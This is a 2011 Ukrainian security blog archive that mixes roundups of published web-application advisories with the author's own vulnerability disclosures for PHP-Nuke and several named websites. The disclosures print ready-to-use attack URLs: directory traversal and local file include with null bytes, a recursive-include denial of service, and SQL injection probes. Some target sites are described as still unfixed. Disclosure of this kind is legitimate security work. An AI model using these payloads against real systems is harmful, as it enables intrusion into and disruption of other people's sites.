Архів для категорії 'Уразливості'

Добірка уразливостей

17:24 14.10.2011

В даній добірці уразливості в веб додатках:

  • Citrix EdgeSight Launcher Service Remote Code Execution Vulnerability (деталі)
  • PHP-Nuke 8.x <= Cross Site Scripting Vulnerability (деталі)
  • curl vulnerabilities (деталі)
  • PHP-Nuke 8.x <= Cross Site Scripting Vulnerability (деталі)
  • HP Data Protector EXEC_CMD Buffer Overflow Vulnerability (деталі)
  • CMS Balitbang 3.3 Arbitary File Upload Vulnerability (деталі)
  • Multiple vulnerabilities in HP Data Protector (деталі)
  • XSS in Oracle default fcgi-bin/echo (деталі)
  • HP OpenView Storage Data Protector, Remote Execution of Arbitrary Code (деталі)
  • Joomla! 1.6.0 | Information Disclosure/Full Path Disclosure Vulnerability (деталі)

DT, LFI, NBI та DoS уразливості в PHP-Nuke

23:53 13.10.2011

Нещодавно я оприлюднив уразливості на hackzona.ru, знайдені мною ще 30.10.2010. Які адміни цього секюрі провекту довго виправляли (і перед цим ще багато років тримали на сайті). Враховуючи, що на сайті використовується PHP-Nuke, то дірки стосуються саме цього движка.

При попередньому перегляді було схоже, що на сайті використовується PHP-Nuke 8.0. Але як показали мої дослідження, що Directory Traversal уразливість була виявлена в PHPNuke 7.8 і 7.9 і експлоіт для неї був розроблений sp3x і оприлюднений ще в 2005 році. Тому, або цей сайт мав 7.9 версію PHP-Nuke, або 8.0 з деякими уразливими модулями (зокрема News) з попередньої версії. Й відповідно цілих п’ять років з часу оприлюднення експлоіту до того як я виявив ці дірки в жовтні 2010 року, адміни їх не виправляли та забивали на безпеку власного сайта.

Якщо sp3x у власному експлоіті наводить лише Directory Traversal (з Null Byte Injection) уразливість, то я доповнив її іншими дірками. І якщо DT потребує виключених mq для використання NBI для проведення атаки, то LFI та DoS уразливості не потребують NBI і тому працюють як з виключеними, так і включеними mq.

Directory Traversal + Null Byte Injection:

http://site/modules.php?name=News&file=../../robots.txt%00

Local File Include + Null Byte Injection:

http://site/modules.php?name=News&file=file.php%00

LFI також можна використати без NBI (для файлів з розширенням php).

DoS (Recursive File Include):

http://site/modules.php?name=News&file=../../modules

Уразливі PHP-Nuke 7.9 і попередні версії.

Добірка уразливостей

15:21 13.10.2011

В даній добірці уразливості в веб додатках:

  • HP Service Manager and HP Service Center, Unauthorized Remote Access, Unsecured Local Access, Remote Disclosure of Privileged Information, HTTP Session Credential Re-use, Cross Site Scripting (XSS) (деталі)
  • XSS vulnerability in Web Poll Pro (деталі)
  • fetchmail security announcement fetchmail-SA-2011-01 (деталі)
  • Tugux CMS (nid) BLIND sql injection vulnerability (деталі)
  • Multiple vulnerabilities in several IP camera products (деталі)
  • XOOPS 2.5.0 <= Cross Site Scripting Vulnerability (деталі)
  • libxml2 vulnerability (деталі)
  • PHP-Nuke 8.x <= "chng_uid" Blind SQL Injection Vulnerability (деталі)
  • smallftpd <= 1.0.3-fix | Connection Saturation Remote Denial of Service Vulnerability (деталі)
  • PHP-Nuke 8.x <= Cross Site Request Forgery (CSRF) / Anti-CSRF Bypass Vulnerability (деталі)

Нові уразливості на br-ua.com

23:58 12.10.2011

22.01.2011

У листопаді, 05.11.2010, я знайшов Cross-Site Scripting, Abuse of Functionality та Insufficient Anti-automation уразливості на проекті http://br-ua.com. Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на www.br-ua.com.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

12.10.2011

XSS:

Три XSS уразливості - дві на сторінці реєстрації та одна на сторінці відновлення паролю. Приклади експлоітів для даних уразливостей.

Abuse of Functionality:

http://br-ua.com/users/register
http://br-ua.com/users/remind

На сторінках реєстрації та відновлення паролю можна визначати емайли користувачів (що є логінами).

Insufficient Anti-automation:

http://br-ua.com/users/register
http://br-ua.com/users/remind

Хоча капчі використовуються на даних сторінках, але для визначення емайлів (логінів) користувачів не потрібно вводити коректну капчу.

Дані уразливості досі не виправлені. Зараз адміни змінили домен br-ua.com на br.mirkvartir.ua (піддомен сайта mirkvartir.ua, теж дірявого), при цьому залишивши всі уразливості. Домен вони змінили явно за для економії, так само як вони економлять на безпеці власних сайтів.

Добірка уразливостей

15:09 12.10.2011

В даній добірці уразливості в веб додатках:

  • Default Credentials Vulnerability in Cisco Network Registrar (деталі)
  • Joomla! 1.6.0 | SQL Injection Vulnerability (деталі)
  • Default Credentials for root Account on the Cisco Media Experience Engine 5600 (деталі)
  • Joomla! 1.6.0 | Cross Site Scripting (XSS) Vulnerability (деталі)
  • GDM vulnerability (деталі)
  • bbPress 1.0.2 <= Cross Site Scripting Vulnerability (деталі)
  • Sybase OneBridge Mobile Data Suite Format String Remore Code Execution Vulnerability (деталі)
  • bbPress 1.0.2 <= Cross Site Scripting Vulnerability (деталі)
  • HP OpenView Storage Data Protector, Remote Execution of Arbitrary Code (деталі)
  • Douran Portal File Download/Source Code Disclosure Vulnerability (деталі)

Уразливості на mirkvartir.ua

23:55 11.10.2011

21.01.2011

У листопаді, 05.11.2010, я знайшов Cross-Site Scripting, Abuse of Functionality та Brute Force уразливості на проекті http://mirkvartir.ua. Про що найближчим часом сповіщу адміністрацію проекту.

Детальна інформація про уразливості з’явиться пізніше.

11.10.2011

XSS:

Три XSS уразливості - дві на сторінці реєстрації та одна на сторінці відновлення паролю. Приклади експлоітів для даних уразливостей.

Abuse of Functionality:

http://mirkvartir.ua/users/register

http://mirkvartir.ua/users/remind

На сторінках реєстрації та відновлення паролю можна визначати емайли користувачів (що є логінами).

Brute Force:

http://mirkvartir.ua/admin/

Дані уразливості досі не виправлені.

Добірка уразливостей

17:36 11.10.2011

В даній добірці уразливості в веб додатках:

  • CodeMeter WebAdmin Cross-site Scripting (XSS) Vulnerability (деталі)
  • XSRF (CSRF) in LotusCMS (деталі)
  • Sun Microsystems Directory Server DSML-over-HTTP Username Search Denial of Service Vulnerability (деталі)
  • XSS vulnerability in LotusCMS (деталі)
  • Sun Microsystems Directory Server Enterprise ASN.1 Parsing Remote Code Execution Vulnerability (деталі)
  • BoutikOne Multiples SQL Injection Vulnerability (деталі)
  • Sun Microsystems Directory Server Enterprise DSML UTF-8 Denial of Service Vulnerability (деталі)
  • SAP NetWaver XI SOAP Adapter - XSS (деталі)
  • Hackproofing Oracle Financials 11i & R12 (деталі)
  • SAP NetWeaver logon.html - XSS (деталі)

Уразливості на www.d1.ie

23:57 10.10.2011

18.01.2011

У жовтні, 30.10.2010, я знайшов SQL Injection, SQL DB Structure Extraction та Cross-Site Scripting уразливості на сайті http://www.d1.ie. Про що найближчим часом сповіщу адміністрацію сайта.

Детальна інформація про уразливості з’явиться пізніше.

10.10.2011

SQL Injection:

http://www.d1.ie/visual.php?intProjectID=-1%20or%20version()%3E4

http://www.d1.ie/page.php?intPageID=-1%20or%20version()%3E4

SQL DB Structure Extraction:

http://www.d1.ie/visual.php?intProjectID=’

http://www.d1.ie/page.php?intPageID=’

XSS:

Дані уразливості досі не виправлені.

Добірка уразливостей

17:25 10.10.2011

В даній добірці уразливості в веб додатках:

  • 7T Interactive Graphical SCADA System (IGSS) Remote Memory Corruption (деталі)
  • Path disclosure in xt:Commerce (деталі)
  • Path disclosure in OXID eShop (деталі)
  • Cisco RVS4000 and WRVS4400N Web Management Interface Vulnerabilities (деталі)
  • File Content Disclosure in LotusCMS (деталі)
  • Cisco Content Delivery System Internet Streamer: Web Server Vulnerability (деталі)
  • XSS vulnerability in LotusCMS (деталі)
  • Remote Password Disclosure Vulnerability in RXS-3211 IP Camera + others (деталі)
  • XSS vulnerability in LotusCMS (деталі)
  • XSS vulnerability in LotusCMS (деталі)

Нові уразливості на hackzona.ru

23:57 08.10.2011

19.01.2011

У жовтні, 30.10.2010, я знайшов Directory Traversal, Local File Include, Null Byte Injection та Denial of Service уразливості на хакерському проекті http://hackzona.ru (на DT дірку звернув мою увагу Dementor). Про що найближчим часом сповіщу адміністрацію проекту.

Раніше я вже писав про уразливості на hackzona.ru.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

08.10.2011

Directory Traversal + Null Byte Injection:

http://hackzona.ru/hz.php?name=News&file=../../robots.txt%00

Local File Include + Null Byte Injection:

http://hackzona.ru/hz.php?name=News&file=file.php%00

DoS (Recursive File Include):

http://hackzona.ru/hz.php?name=News&file=../../hz

Дані уразливості вже виправлені.